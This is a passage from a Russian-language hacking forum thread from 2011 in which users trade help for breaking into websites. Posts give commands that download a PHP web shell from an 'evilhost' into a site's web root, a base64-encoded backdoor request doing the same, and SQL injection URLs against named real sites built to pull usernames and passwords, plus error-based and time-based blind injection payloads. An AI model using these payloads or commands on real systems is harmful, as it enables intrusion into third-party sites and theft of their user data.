Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    curl, fetch, links, lynx, get
    Проверить наличие качалок можно команой which.
    В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу на сервере)

    Синтаксис:

    get -o /path/shell.php http://site.com/shell.txt
    fetch -o /path/shell.php http://site.com/shell.txt
    curl --output /path/shell.php http://site.com/shell.txt
    links -source http://site.com/shell.txt > /path/shell.php
    lynx -source http://site.com/shell.txt > /path/shell.php

    Можно, зависит от настроек php.

    Пример для allow_url_fopen = on (ну и функция copy разумеется не должна находиться в disable functions)
    Посылаешь пакет:
    HTML:
    POST http://site.com/backdoor.php HTTP/1.1
    Host: site.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip,deflate
    Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 77
    Keep-Alive: 115
    Connection: keep-alive
    
    e=Y29weSgnaHR0cDovL2V2aWxob3N0L3NoZWxsLnR4dCcsJy9zaXRlL3d3dy9zaGVsbC5waHAnKTs
    
    где e=copy('http://evilhost/shell.txt','/site/www/shell.php'); в base64_encode

    http://evilhost/shell.txt - откуда льем
    /site/www/shell.php - куда (абсолютный путь до папки доступной на запись)
     
    #16241 h00lyshit!, 3 Mar 2011
    Last edited: 3 Mar 2011
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    тама очень просто с курлом

    Code:
     curl http://evilhost/shell.php > /home/www/public_html/shell.php 
     
    _________________________
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите обойти фильтрацию.

    http://www.footballfoundation.org/news.php?id=2194/**/union/**/select/**/1,2,3,4,5,6,7+--+
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    PHP:
    <?php

    $curl 
    curl_init("http://www.footballfoundation.org/news.php");

     
    curl_setopt($curlCURLOPT_HEADER1);
     
    curl_setopt($curlCURLOPT_POST1);
     
    curl_setopt($curlCURLOPT_POSTFIELDS"id=2194/**/and/**/0/**/union/**/select/**/1,2,3,4,5,6,7+--+");
    curl_setopt($curlCURLOPT_RETURNTRANSFER1);
     
    $cont curl_exec($curl);
     echo 
    $cont;
     
    ?>
    пост наше щастье :)
     
    _________________________
    1 person likes this.
  5. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.
     
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Эм... Способ эксплуатации SQL-inject'a не изменился и не думаю, что измениться. А если хочешь разобраться хорошо в разных SQL-языках, то читай книги по этим языкам и все. А для всего остального шпаргалки\статьи, которые есть на широких просторах интернета и в т.ч. на этом форуме.
     
    1 person likes this.
  7. DieWithMe

    DieWithMe New Member

    Joined:
    25 Feb 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться с sql-иньекциями.
    С помощью сканера из этого топика нашел 10 уязвимостей на нужном мне сайте, большинство из них sql. Сам сканер в качестве уязвимой ссылки выдает что-то оканчивающееся на 0'+'1'=2. Пробовал подставлять вместо этого различные эксплоиты и просто кавычку, но показывается обычная страница, без всяких ошибок.
    Собственно интересно, сканер врет или я что-то не то делаю... Как можно проверить на sql уязвимость кроме кавычки?
     
  8. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    как говорил конки, спроси у сканера

    а если по теме то https://forum.antichat.net/thread19844.html
     
  9. DieWithMe

    DieWithMe New Member

    Joined:
    25 Feb 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Судя по первому абзацу все-же сканер врет...
    Сайт нагуглил по версии джумлы, вот линки на предполагаемые уязвимости
    liceum9.ru/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2 юзеры начинаются с id 121, для их просмотра пришлось зарегится.
    http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id=60&Itemid=%2099999%20union%20select%201,concat_ws%280x3a,username,password%29,%203,4,5%20from%20jos_users/*
    http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&id='0'+and+'1'='2
    В последнем вообще валидный id подобрать не смог...
    Проверьте, пожалуйста, эти ссылки на sql-уязвимость. Очень хочется, чтобы первый блин не вышел комом.
     
    #16249 DieWithMe, 4 Mar 2011
    Last edited: 4 Mar 2011
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    так отоброжает скуль:
    _http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+select+1,2,/*!table_name*/+from+information_schema.tables

    а так нет:
    _http://www.pravo-advokat.ru/index.php?p_id=2&m_id=-4+/*!union*/+union+select+1,2,/*!column_name*/+from+information_schema.columns+where+table_name=0x%75%73%65%72%73

    подскажите куда копать дальше.
     
    _________________________
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    %75%73%65%72%73 wtf?

    // Ты не в теме, это приватный zero day эксплойт

    чОрт( я снова не в теме(
     
    #16251 Seravin, 4 Mar 2011
    Last edited: 4 Mar 2011
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    При чем тут URLENCODE? надо в hex.
     
    #16252 Tigger, 4 Mar 2011
    Last edited by a moderator: 5 Mar 2011
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите вывести имена колонок.


    http://www.pravo-advokat.ru/index.php?p_id=2+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+column_name+from+INFORMATION_SCHEMA.columns+where+table_name=0x7573657273+limit+0,1),1,64),floor(rand(0)*2)))z)+--+&m_id=4
     
  14. BluR

    BluR Member

    Joined:
    6 Aug 2009
    Messages:
    7
    Likes Received:
    20
    Reputations:
    0
    вечер всем добрый ... нужно помощь в sql inj ... сразу скажу .. я новичок ... так что могу написать глупость ...

    к делу ... есть иньекция в guestbook одного сайта (могу кинуть ссылку в пм) ...
    при добавление ковычки к запросу получаю ошибку :
    Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[email protected]','bbbbbbbbbbb',null, CURRENT_TIMESTAMP)' at line 1
    Как я понимаю запрос выглядит примерно так :
    INSERT INTO tables VALUES ('name','mail','mesege',null, CURRENT_TIMESTAMP)
    подставляю ' ) --
    получаю ошибку
    Ошибка: Column count doesn't match value count at row 1
    тогда подставляю bvbvbvbb','[email protected]','ffffffffff',null, CURRENT_TIMESTAMP ) --
    как я понимаю ... должно добавиться сообщение в гостевой книге но опятьже получаю ошибку
    Ошибка: Column count doesn't match value count at row 1

    Подскажите люди добрые ... как тут быть
    P.s иньекцию делаю через форму name
     
    #16254 BluR, 5 Mar 2011
    Last edited: 5 Mar 2011
  15. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    При подстановке ' довольно часто сталкиваюсь вот с такой ошибкой
    Так понимаю это ничего не дает или я не прав?
     
  16. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Таблица tables содержит 5 колонок (количество полей в левой и правой части запроса должно совпадать)

    Вписывая в поле ' )-- -

    Запрос принимает вид

    HTML:
    INSERT INTO tables VALUES ('')-- -
    MySQL выдаст ошибку: Column count doesn't match value count at row 1, так как количество полей не совпадает.

    Как проводить инъекцию, зависит от того, что ты хочешь получить.

    Ты можешь либо уравнять количество полей и вписать произвольные значения в базу в текущий запрос, отсеив остальное комментарием

    bla','123123','[email protected]','ya mega hacker','777')-- -

    Запрос примет вид

    HTML:
    INSERT INTO tables VALUES ('bla','123123','[email protected]','ya mega hacker','777')-- -
    либо спровоцировать ошибку duplicate entry и выводить инфу через нее

    bla','123123','[email protected]','ya mega hacker','777') on duplicate key update name = (select 1 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a)-- -

    Запрос примет вид

    HTML:
    INSERT INTO tables VALUES ('bla','123123','[email protected]','ya mega hacker','777') on duplicate key update name = (select 1 from (select count(*), concat(version(), floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
    Вывод: Duplicate entry '5.0.91-community1' for key 1

    Либо вытаскивать инфу основываясь на временных задержках


    bla','123123','[email protected]','ya mega hacker',(if(ascii(mid((select table_name from information_schema.tables limit 0,1),1,1))>66,(sleep(10)),1)))-- -

    Запрос примет вид

    HTML:
    INSERT INTO tables VALUES ('bla','123123','[email protected]','ya mega hacker',(if(ascii(mid((select table_name from information_schema.tables limit 0,1),1,1))>66,(sleep(10)),1)))-- -
    
    И так далее

    UPD: Не внимательно прочитал сообщение, тогда пали сюда линк.
     
    #16256 h00lyshit!, 5 Mar 2011
    Last edited: 21 Mar 2011
  17. omg_it_glowZ

    omg_it_glowZ New Member

    Joined:
    29 Jan 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    -2
    Есть у кого словарь для брута колонок? Не могу никак в таблице Administrator подобрать колонки...
     
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    http://forum.antichat.ru/thread148915-toolza.html вот тут хороший
     
  19. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    Какая-то странная скуля, может кто сталкивался
    +union+select+1--
    Code:
    Database access error:
    SELECT `username`, `name`, `date` FROM `users` WHERE `ID`=9999999999 union select 1--
    
    +union+select+1,2--
    Code:
    Database access error:
    SELECT `picture` FROM `users` WHERE `ID`=9999999999 union select 1,2--
    
    Не могу понять каким образом разные запросы вылазят.
     
  20. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    два запроса на странице, подставляя union select 1, первый становится верным, поэтому выдает ошибку со второго, в котором 3 поля, а подставив любое другое количество, ошибку выдаст первый запрос
    крути через ошибку или вслепую
     
Thread Status:
Not open for further replies.